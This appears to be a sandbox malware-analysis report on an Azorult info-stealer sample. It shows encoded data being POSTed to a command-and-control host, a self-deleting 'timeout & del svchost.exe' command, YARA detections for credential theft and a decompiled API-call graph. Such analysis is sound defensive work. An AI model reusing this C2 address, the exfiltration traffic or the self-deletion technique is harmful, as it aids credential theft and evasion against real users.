                                  Host: ln6b9.shop
                                  Content-Length: 105
                                  Cache-Control: no-cache
                                  Data Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 8b 30 65 8b 30 64 8b 30 6d eb 47 16 ed 26 66 97 26 67 ea 40 70 9d 30 70 9d 37 14 8b 30 61 e8 26 66 9e 26 66 97
                                  Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;10e0d0mG&f&g@p0p70a&f&f
                                  Aug 29, 2024 23:42:06.009866953 CEST1236INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 21:42:05 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: PHP/5.6.37
                                  Vary: Accept-Encoding,User-Agent
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6VsGI8ptrUBTu4hOUWpoyKktshWAvYcQ44E5J5UW6WB7BvD10wf0jA0%2FxQvm%2BQIzQ%2FbGuGXR2VVFtramH3PDGem5AQXewUEW78DN2qNtGsGpKn0jQNN5AB%2BVbjKh"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8bafb577aab919ef-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 31 63 30 65 0d 0a 3f 36 90 4f 06 dd 77 1e d7 33 21 e2 50 65 dc 4f 04 9e 48 07 c9 68 2d ed 50 03 f8 56 65 f8 50 00 e8 49 05 fc 68 39 e3 51 06 f8 60 07 e9 55 2f cf 30 07 d8 60 13 d9 49 1e c7 36 65 cb 4b 04 dd 48 3c 9b 68 37 9c 4e 24 e2 40 3a db 66 12 d6 79 1e c9 68 2f e3 42 3e dc 40 06 9e 49 11 ff 73 12 ed 57 1c e4 49 03 f8 57 07 f8 49 04 fb 68 6c e9 50 00 d6 45 1f f8 7b 10 cc 31 1b 9f 61 02 f8 76 31 e6 4d 36 ed 50 3a db 67 1d c6 33 19 ed 6c 20 f4 44 6c c4 48 3c d9 72 19 c0 6b 26 cd 7a 3a e4 4e 2f ef 49 1e d9 68 21 ed 52 65 e5 50 04 c5 37 19 c4 52 67 e2 69 10 d7 4e 2c 9a 79 18 d4 73 03 fb 74 65 e5 3f 7a cd 3d 69 c0 3d fc bb 5a 79 0b 15 48 d8 a2 5e b3 61 f2 b9 56 79 05 09 0b dc a4 5c fb 2f f1 fa 1e 65 4b 56 4b cb a7 5c a4 4f c7 5b 33 57 66 66 65 ab cb 30 9e fd 62 cb 33 ec 66 66 65 af cb 30 9e 42 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e ba 9d cb 33 5a 79 dc 6b af 7f 39 53 23 25 ca 7f 99 47 32 0d c6 b8 10 ee 70 f2 ac 41 35 0b 46 06 ce a5 5e [TRUNCATED]
                                  Data Ascii: 1c0e?6Ow3!PeOHh-PVePIh9Q`U/0`I6eKH<h7N$@:fyh/B>@IsWIWIhlPE{1av1M6P:g3l DlH<rk&z:N/Ih!ReP7RgiN,yste?z=i=ZyH^aVy\/eKVK\O[3Wffe0b3ffe0B3Tffe03Tffe03Tffe03Zyk9S#%G2pA5F^vVt^F9=&3Tffet;_j0UjCQ1UjS#fe2'Tffe0_gho03Tffe03TFfe03Tdfe03^ffe03Tdfe06Tfbe03Tvfe03Twfe03Tffe03Tffe03l[fe03Tvfe03Tff
                                  Aug 29, 2024 23:42:06.009884119 CEST224INData Raw: 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 2c e9 ae 4b 20 66 66 65 84 cf 30 9e 02 8d cb 33 54
                                  Data Ascii: e03Tffe03Tffe03Tffe03Tffe03Tffe0,K ffe03T`fe03Tffe0"Sz03TFfe03Tffe03ff%0'Tffe093vfe03D030ffe?03Tffe.q23Dffe0
                                  Aug 29, 2024 23:42:06.009895086 CEST1236INData Raw: 33 54 66 66 65 fd 98 74 cd 4f df 0e f0 86 c6 53 68 e8 72 08 08 25 3e af c6 55 66 66 65 ce bb 59 b3 6f ee e6 44 3d 08 4b 06 c0 b9 55 b3 61 f2 a5 40 3b 0a 03 48 c3 fa 1d af 2f ad e5 43 30 04 66 65 af cb 30 9e 02 8d cb 33 00 66 66 65 81 b9 54 ff 76
                                  Data Ascii: 3TffetOShr%>UffeYoD=KUa@;H/C0fe03ffeTv3vfe0,R BTe3Twfe0,R fe0b3z34Ffe?0,A7BVW03Tffe03D03Uffe03|wfe03wfe0.3tfe>03t
                                  Aug 29, 2024 23:42:06.009907007 CEST1236INData Raw: 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02
                                  Data Ascii: 3Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe13Lf
                                  Aug 29, 2024 23:42:06.009918928 CEST1236INData Raw: 33 54 66 66 65 af cb 30 9e 3a a0 cb 33 54 64 64 65 9f 49 0d bb 04 94 e1 b5 1c e0 91 68 ae cc 32 3e 80 a0 dd 03 d6 5b 74 67 ae ca 01 95 32 94 cd 36 7f 68 65 67 b5 ce 30 ae 4e 9b c1 18 52 67 62 64 2d fc 32 9f 06 3d f5 03 68 56 71 63 a5 e0 36 9f 06
                                  Data Ascii: 3Tffe0:3TddeIh2>[tg26heg0NRgbd-2=hVqc6IVgiU1i1fVD6)1Ncfa:TXftap/I0eg213ogp}43TfU9MYgg`3:Re3a2QE`e0#U[=20bavUoWex
                                  Aug 29, 2024 23:42:06.009931087 CEST1236INData Raw: fb 9b dc 8b 38 f9 39 7b 22 48 5b 2c 0c 69 c6 62 5f b7 ea d1 7a cf 39 52 39 d1 90 9c 48 31 e4 a1 95 df 42 d8 22 21 8c 4c 5c 5e 4c ac da 73 4e 38 35 b1 01 d1 10 e7 70 f4 3d 5b 41 79 cd bd 35 aa 79 11 46 21 d5 73 a1 54 2a 5d d3 90 0c f1 66 57 ae 7f
                                  Data Ascii: 89{"H[,ib_z9R9H1B"!L\^LsN85p=[Ay5yF!sT*]fWp1_4^kz|djNIlU-WdggFi2,Vkcj2Ucce20b`vc5W3bmgq]37Sua7]l-dz`f:P&
                                  Aug 29, 2024 23:42:06.009942055 CEST1236INData Raw: ca 73 a1 92 c8 b5 f8 51 fd 0e 38 82 26 3a f1 72 c0 6e a1 ee cf fb 07 b1 8b b8 30 29 7f fd b3 f4 40 0e b3 b8 24 f6 7e 8c ed be 1d dc 4a f9 4c db 92 4d 26 d8 29 b8 21 aa a0 79 8c c0 af 96 8d 85 8a 20 32 ca 10 c6 18 f5 0f b4 ae c6 7a 8d 47 19 de a9
                                  Data Ascii: sQ8&:rn0)@$~JLM&)!y 2zG*[E];JgH>iQa}E]0`!X*FC:J`}D!Wf2Nffe.1leuVt9$Xxg|SoC`ll=2MpoBqGeK
                                  Aug 29, 2024 23:42:06.009953976 CEST1236INData Raw: 97 d6 7a f5 87 3b cc 2d 6c e0 d3 33 bf f5 ac 8e 76 0a 5a 7e 56 19 4f 44 41 c1 4c 17 08 34 d1 c8 82 f2 ce 1d 54 98 44 99 39 b2 06 92 12 bf ba 79 4a 37 30 22 c7 fe 06 c9 77 a1 c5 9d ee cf 64 23 21 80 94 c4 44 ac 49 49 01 3a 9a c2 f0 bc 2f db f7 e5
                                  Data Ascii: z;-l3vZ~VODAL4TD9yJ70"wd#!DII:/4iMuhiF@o_p0](l{,!36Ds|e#SS]k#]O}.~8\Tq1;2863FJons/Qw[e2aUs>W#{'w{YJA
                                  Aug 29, 2024 23:42:06.009965897 CEST1236INData Raw: c5 ee 4d 0f f6 76 e9 bb 09 7b 49 05 17 c3 e5 5d f7 61 ef a4 40 3b 00 12 4b cc a4 5d b1 72 f6 a2 1c 37 14 0a 4a df b9 5f fa 77 fe bf 40 7b 0b 0f 06 dd a4 43 f1 64 e9 b9 5c 3b 12 05 00 dd bf 1e fd 70 f1 fb 67 52 6e 4d 63 ae ce 35 99 03 9c cf 7b 64
                                  Data Ascii: Mv{I]a@;K]r7J_w@{Cd\;pgRnMc5{d V!4dd]D8D#HBqGz[-A I(BqGB,Gdu`f5\M`d75]L-)<=3WddwbP{2H<SuHHi`%1(FvR
                                  Aug 29, 2024 23:42:06.009979963 CEST1236INData Raw: f9 9e cf 9d 41 ab 43 d5 55 f2 56 b5 43 9c 8d 85 be cd a3 99 35 ed dd a4 db 3d d0 e3 21 20 bc ea 54 bb 6b 16 c8 d2 62 cc 9d a5 df 3b f8 e1 1b 08 f8 c2 e9 14 02 d3 76 4d aa 6e a7 59 0a 8a 3a e0 a7 f4 e5 8b ad f1 78 54 0a 60 92 2c 09 9b 2d 89 be 00
                                  Data Ascii: ACUVC5=! Tkb;vMnY:xT`,-@#$I(G!48K2,@+OP7$R0{L*0_RYOe X7vdyBI2h6dwg_Voc4`euVted5DlZ`e0
                                  Aug 29, 2024 23:42:06.014911890 CEST1236INData Raw: 92 a2 ca 31 9f 07 9d c8 b1 55 69 66 55 2d ca 3a 9c 80 9c ca 33 ed 95 70 f4 fe 30 a3 f1 b5 24 66 d8 3c cc 38 fe 28 0e 20 be 74 56 27 e7 9c fa 8c 10 c7 62 6a 1f 37 d2 45 12 bd 74 5c e5 26 56 5f 97 f8 e4 f4 51 eb a1 df 65 d6 ca 43 b1 08 6e ac 0a bc
                                  Data Ascii: 1UifU-:3p0$f<8( tV'bj7Et\&V_QeCn0ji^KNW.hml/?>tDLFaGOb}1lan(Qf3Y?P;F<#78{b_*"sH`?="h-UDK&X}^}i


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.449731172.67.128.117804940C:\Windows\SysWOW64\svchost.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 29, 2024 23:42:10.314457893 CEST165OUTPOST /LN341/index.php HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                  Host: ln6b9.shop
                                  Content-Length: 32713
                                  Cache-Control: no-cache
                                  Aug 29, 2024 23:42:10.314536095 CEST11124OUTData Raw: 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 8b 30 65 8b 30 64 8b 30 6d eb 47 16 ed 26 66 97 26
                                  Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;10e0d0mG&f&g@p0p70a&f&fp2p3pFp3)j;l"&g&f&f&gF;f'q<f)&f&fp;p:p4p6p3p5)l;p)0e&fp3)0g0aF)1Bm@4`@x1l.aA7b@cGc:;a6x
                                  Aug 29, 2024 23:42:10.319325924 CEST1236OUTData Raw: 50 14 ed 40 19 ed 45 01 f8 5b 16 e5 48 1f ea 4d 02 ff 42 10 fa 4d 0d e6 4a 1a ff 40 11 fa 5b 19 e2 55 10 ff 4f 1b e2 44 11 e7 4c 00 e2 4d 13 e0 4d 11 f6 57 03 f7 5a 06 fe 47 02 f9 59 1d ea 50 0c e6 41 07 f6 4e 00 ef 42 1d e4 4a 12 fd 44 19 fd 45
                                  Data Ascii: P@E[HMBMJ@[UODLMMWZGYPANBJDEDSBYYZR@[N@NIPRUANALYHMLPRQOLWYIQDWLZDNHUVOKS[ZBOHHTA
                                  Aug 29, 2024 23:42:10.319504976 CEST3708OUTData Raw: 5a 1b fd 53 03 f6 56 02 e0 4d 16 f9 42 00 f4 5b 14 e9 40 14 fa 53 1b e6 4d 1b f7 4a 16 ea 40 07 e3 57 1e fc 4c 11 fb 40 11 ea 45 0f e5 4b 19 e7 50 19 f8 4c 1c e8 59 05 ea 57 1a fd 4a 10 fc 46 13 e6 5a 10 f9 56 17 e4 48 1f fc 54 0d e3 59 00 e9 40
                                  Data Ascii: ZSVMB[@SMJ@WL@EKPLYWJFZVHTY@[FRWFGJRHIMK@QLIUIYUNYG@PAHPUJ[SNJPNF@YZZMVEIDUMHPBZO
                                  Aug 29, 2024 23:42:10.319518089 CEST1236OUTData Raw: 53 10 fb 54 18 e1 5a 01 ec 40 11 ed 42 0c f8 45 1f e2 5b 17 ed 4d 06 e5 41 11 f9 4e 06 ff 5a 10 ff 5a 07 fb 57 07 eb 42 0f ea 51 1b ff 4a 0f f7 5b 05 fc 49 0d fb 49 0d ea 5a 0f f7 4f 1f f9 4c 03 fe 40 10 f4 50 16 fd 56 06 fc 46 0c ea 4e 01 fc 55
                                  Data Ascii: STZ@BE[MANZZWBQJ[IIZOL@PVFNUJUSEEV@MJZKFEPUKYJVYWWEJAI@DIHFNFWDQYHP[NUIMODJBUWS[[
                                  Aug 29, 2024 23:42:10.319535971 CEST4944OUTData Raw: 45 1f ea 4d 18 f9 57 1a e8 45 1e fc 51 1c e0 40 07 ea 40 13 e9 49 14 e4 4d 18 f7 52 1d e9 5b 12 f8 4b 03 f7 53 10 fb 45 17 e0 56 1c e9 56 03 e9 41 0c ff 48 1c ef 49 19 e7 55 14 ed 55 1c e6 46 12 f4 4a 0c e5 50 07 e1 56 07 e0 44 0f fd 40 01 fb 48
                                  Data Ascii: EMWEQ@@IMR[KSEVVAHIUUFJPVD@HEDBSAI@KG[D[KQMFNMS[PBHVABBKOHWYZNAYHEPOKYKPFFYONI[DM
                                  Aug 29, 2024 23:42:10.319561005 CEST4944OUTData Raw: 49 1b e5 47 01 e5 59 18 ec 4b 07 eb 4d 17 ed 42 0c fb 41 14 fd 52 1a fa 48 1e f8 4d 16 fa 59 1c e1 44 1a fb 55 03 ea 4d 0d f7 55 1f e8 4b 0d fa 53 06 f4 4e 1a f9 54 16 fe 53 18 ec 4e 19 ed 57 01 fe 44 1a e0 47 03 e4 4c 03 e2 40 18 fa 54 07 eb 50
                                  Data Ascii: IGYKMBARHMYDUMUKSNTSNWDGL@TPGMD[BUZBQRTZMZDK[R[R@AJBADT_HVUUUUQwUj9p_AJPGYLL{l6GYLL
                                  Aug 29, 2024 23:42:10.319602966 CEST2472OUTData Raw: 44 1d d4 0e 5f ed 53 00 8e 40 3a db 6d 21 94 23 61 a3 09 12 cb 77 07 ef 4e 6f 8e 3b 64 97 32 58 a4 55 3c ca 66 3a 8e 4a 3b c8 6c 58 a4 4e 3c cd 71 3a dd 6c 33 da 23 17 cf 70 3c cd 23 11 c7 70 25 c2 62 2c 8e 42 31 cf 73 21 cb 71 58 a4 0e 5f a3 09
                                  Data Ascii: D_S@:m!#awNo;d2XU<f:J;lXN<q:l3#p<#p%b,B1s!qX_XXp!nuq:f&^Xp!nX\f2p!zX\n&-0fX\f8q,@:s'p&l;6q&-0fXt<o:l;f-_e:w1u=p!f-_g"-0fXf-o:f'f-_N<Z,l#Wg1M
                                  Aug 29, 2024 23:42:10.319634914 CEST2472OUTData Raw: 75 1f fa 5a 22 ca 67 3b e0 51 11 c0 6c 36 fd 42 1a d7 54 03 cf 2d 30 d6 66 58 a4 0a 18 c7 40 0c d7 41 3a d8 49 01 f7 74 31 ca 6d 1b fc 47 3b c1 60 06 ef 4c 2c f9 55 34 80 66 2d cb 0e 5f a7 4e 3c ed 5a 2c ec 6c 23 e4 57 0c d9 67 31 c0 4d 07 ea 6d
                                  Data Ascii: uZ"g;Ql6BT-0fX@A:It1mG;`L,U4f-_N<Z,l#Wg1Mm:Pzb{{0\jzuZ"g;Ql6BT-0fX@A:It1mG;`L,U4f-_N<Z,l#Wg1Mm:Pzb{{0\jzuZ"g;Ql6BT-0fX@
                                  Aug 29, 2024 23:42:10.319634914 CEST577OUTData Raw: 57 17 f4 44 1c e1 4c 06 e1 5f 11 fa 41 0f e9 4a 1a e1 50 1a 80 67 3a cd 7b 05 e5 02 57 a0 03 5b ae 03 55 ae 03 55 ae 03 55 ca 2c 7c c6 01 51 ae 03 57 aa 03 55 8c 03 55 ae 03 55 ae 03 54 ae 23 55 ae 03 b3 f6 03 55 e8 6a 39 cb 70 09 9c 5f 11 fa 41
                                  Data Ascii: WDL_AJPg:{W[UUU,|QWUUUT#UUj9p_AJPLRZV{o&S[UUUhUQwUUUU+o0_gBBZAJ@A-1`-HTUUUUsNWUU!UUUuUbUE<f&1J
                                  Aug 29, 2024 23:42:14.381748915 CEST629INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 21:42:14 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: PHP/5.6.37
                                  Vary: User-Agent
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CKHFkk3fyb%2BN0CrLosKjkX%2B0LSlqRj7Ht5Lv38bad8NQBjVfrcVo3NetJzN%2FQqbRbK%2Fvb%2BJkpAt5TjApb7NMENp9LAlHCA7hSX4xpDWujyubXcp5hd6gTsY5ac9c"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8bafb59cfa924372-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 37 0d 0a 66 61 6c 73 65 4f 4b 0d 0a 30 0d 0a 0d 0a
                                  Data Ascii: 7falseOK0


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:17:41:57
                                  Start date:29/08/2024
                                  Path:C:\Users\user\Desktop\cJX8BV8LYG.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\cJX8BV8LYG.exe"
                                  Imagebase:0x780000
                                  File size:1'320'960 bytes
                                  MD5 hash:528D3EF48415F22BD277A9759D83A859
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:1
                                  Start time:17:42:03
                                  Start date:29/08/2024
                                  Path:C:\Windows\SysWOW64\svchost.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\cJX8BV8LYG.exe"
                                  Imagebase:0xe40000
                                  File size:46'504 bytes
                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000002.1816447346.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: Azorult_1, Description: Azorult Payload, Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Azorult, Description: detect Azorult in memory, Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000002.1816856617.0000000006C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:17:42:14
                                  Start date:29/08/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"
                                  Imagebase:0x240000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:17:42:14
                                  Start date:29/08/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:5
                                  Start time:17:42:14
                                  Start date:29/08/2024
                                  Path:C:\Windows\SysWOW64\timeout.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\system32\timeout.exe 3
                                  Imagebase:0x2b0000
                                  File size:25'088 bytes
                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:3.3%
                                    Dynamic/Decrypted Code Coverage:1.3%
                                    Signature Coverage:2.9%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:62
                                    execution_graph 95118 781098 95123 7842de 95118->95123 95122 7810a7 95144 78a961 95123->95144 95127 784342 95142 784378 95127->95142 95161 7893b2 95127->95161 95129 78436c 95165 7837a0 95129->95165 95130 78441b GetCurrentProcess IsWow64Process 95132 784437 95130->95132 95133 78444f LoadLibraryA 95132->95133 95134 7c3824 GetSystemInfo 95132->95134 95135 78449c GetSystemInfo 95133->95135 95136 784460 GetProcAddress 95133->95136 95137 784476 95135->95137 95136->95135 95139 784470 GetNativeSystemInfo 95136->95139 95140 78447a FreeLibrary 95137->95140 95141 78109d 95137->95141 95138 7c37df 95139->95137 95140->95141 95143 7a00a3 29 API calls __onexit 95141->95143 95142->95130 95142->95138 95143->95122 95169 79fe0b 95144->95169 95146 78a976 95179 79fddb 95146->95179 95148 7842f5 GetVersionExW 95149 786b57 95148->95149 95150 7c4ba1 95149->95150 95151 786b67 _wcslen 95149->95151 95152 7893b2 22 API calls 95150->95152 95154 786b7d 95151->95154 95155 786ba2 95151->95155 95153 7c4baa 95152->95153 95153->95153 95204 786f34 22 API calls 95154->95204 95157 79fddb 22 API calls 95155->95157 95159 786bae 95157->95159 95158 786b85 __fread_nolock 95158->95127 95160 79fe0b 22 API calls 95159->95160 95160->95158 95162 7893c0 95161->95162 95163 7893c9 __fread_nolock 95161->95163 95162->95163 95205 78aec9 95162->95205 95163->95129 95163->95163 95166 7837ae 95165->95166 95167 7893b2 22 API calls 95166->95167 95168 7837c2 95167->95168 95168->95142 95170 79fddb 95169->95170 95172 79fdfa 95170->95172 95175 79fdfc 95170->95175 95189 7aea0c 95170->95189 95196 7a4ead 7 API calls 2 library calls 95170->95196 95172->95146 95174 7a066d 95198 7a32a4 RaiseException 95174->95198 95175->95174 95197 7a32a4 RaiseException 95175->95197 95177 7a068a 95177->95146 95182 79fde0 95179->95182 95180 7aea0c ___std_exception_copy 21 API calls 95180->95182 95181 79fdfa 95181->95148 95182->95180 95182->95181 95186 79fdfc 95182->95186 95201 7a4ead 7 API calls 2 library calls 95182->95201 95184 7a066d 95203 7a32a4 RaiseException 95184->95203 95186->95184 95202 7a32a4 RaiseException 95186->95202 95187 7a068a 95187->95148 95195 7b3820 __dosmaperr 95189->95195 95190 7b385e 95200 7af2d9 20 API calls __dosmaperr 95190->95200 95192 7b3849 RtlAllocateHeap 95193 7b385c 95192->95193 95192->95195 95193->95170 95195->95190 95195->95192 95199 7a4ead 7 API calls 2 library calls 95195->95199 95196->95170 95197->95174 95198->95177 95199->95195 95200->95193 95201->95182 95202->95184 95203->95187 95204->95158 95206 78aedc 95205->95206 95210 78aed9 __fread_nolock 95205->95210 95207 79fddb 22 API calls 95206->95207 95208 78aee7 95207->95208 95209 79fe0b 22 API calls 95208->95209 95209->95210 95210->95163 95211 7b90fa 95212 7b9107 95211->95212 95216 7b911f 95211->95216 95268 7af2d9 20 API calls __dosmaperr 95212->95268 95214 7b910c 95269 7b27ec 26 API calls pre_c_initialization 95214->95269 95217 7b9117 95216->95217 95218 7b917a 95216->95218 95270 7bfdc4 21 API calls 2 library calls 95216->95270 95231 7ad955 95218->95231 95221 7b9192 95238 7b8c32 95221->95238 95223 7b9199 95223->95217 95224 7ad955 __fread_nolock 26 API calls 95223->95224 95225 7b91c5 95224->95225 95225->95217 95226 7ad955 __fread_nolock 26 API calls 95225->95226 95227 7b91d3 95226->95227 95227->95217 95228 7ad955 __fread_nolock 26 API calls 95227->95228 95229 7b91e3 95228->95229 95230 7ad955 __fread_nolock 26 API calls 95229->95230 95230->95217 95232 7ad961 95231->95232 95233 7ad976 95231->95233 95271 7af2d9 20 API calls __dosmaperr 95232->95271 95233->95221 95235 7ad966 95272 7b27ec 26 API calls pre_c_initialization 95235->95272 95237 7ad971 95237->95221 95239 7b8c3e ___BuildCatchObject 95238->95239 95240 7b8c5e 95239->95240 95241 7b8c46 95239->95241 95243 7b8d24 95240->95243 95248 7b8c97 95240->95248 95339 7af2c6 20 API calls __dosmaperr 95241->95339 95346 7af2c6 20 API calls __dosmaperr 95243->95346 95245 7b8c4b 95340 7af2d9 20 API calls __dosmaperr 95245->95340 95246 7b8d29 95347 7af2d9 20 API calls __dosmaperr 95246->95347 95249 7b8cbb 95248->95249 95250 7b8ca6 95248->95250 95273 7b5147 EnterCriticalSection 95249->95273 95341 7af2c6 20 API calls __dosmaperr 95250->95341 95254 7b8cb3 95348 7b27ec 26 API calls pre_c_initialization 95254->95348 95255 7b8cab 95342 7af2d9 20 API calls __dosmaperr 95255->95342 95256 7b8cc1 95258 7b8cdd 95256->95258 95259 7b8cf2 95256->95259 95343 7af2d9 20 API calls __dosmaperr 95258->95343 95274 7b8d45 95259->95274 95261 7b8c53 __wsopen_s 95261->95223 95264 7b8ce2 95344 7af2c6 20 API calls __dosmaperr 95264->95344 95265 7b8ced 95345 7b8d1c LeaveCriticalSection __wsopen_s 95265->95345 95268->95214 95269->95217 95270->95218 95271->95235 95272->95237 95273->95256 95275 7b8d6f 95274->95275 95276 7b8d57 95274->95276 95278 7b90d9 95275->95278 95283 7b8db4 95275->95283 95358 7af2c6 20 API calls __dosmaperr 95276->95358 95380 7af2c6 20 API calls __dosmaperr 95278->95380 95279 7b8d5c 95359 7af2d9 20 API calls __dosmaperr 95279->95359 95282 7b90de 95381 7af2d9 20 API calls __dosmaperr 95282->95381 95284 7b8dbf 95283->95284 95285 7b8d64 95283->95285 95291 7b8def 95283->95291 95360 7af2c6 20 API calls __dosmaperr 95284->95360 95285->95265 95288 7b8dcc 95382 7b27ec 26 API calls pre_c_initialization 95288->95382 95289 7b8dc4 95361 7af2d9 20 API calls __dosmaperr 95289->95361 95293 7b8e08 95291->95293 95294 7b8e4a 95291->95294 95295 7b8e2e 95291->95295 95293->95295 95329 7b8e15 95293->95329 95365 7b3820 21 API calls __dosmaperr 95294->95365 95362 7af2c6 20 API calls __dosmaperr 95295->95362 95298 7b8e33 95363 7af2d9 20 API calls __dosmaperr 95298->95363 95301 7b8e61 95366 7b29c8 95301->95366 95302 7b8fb3 95305 7b9029 95302->95305 95309 7b8fcc GetConsoleMode 95302->95309 95303 7b8e3a 95364 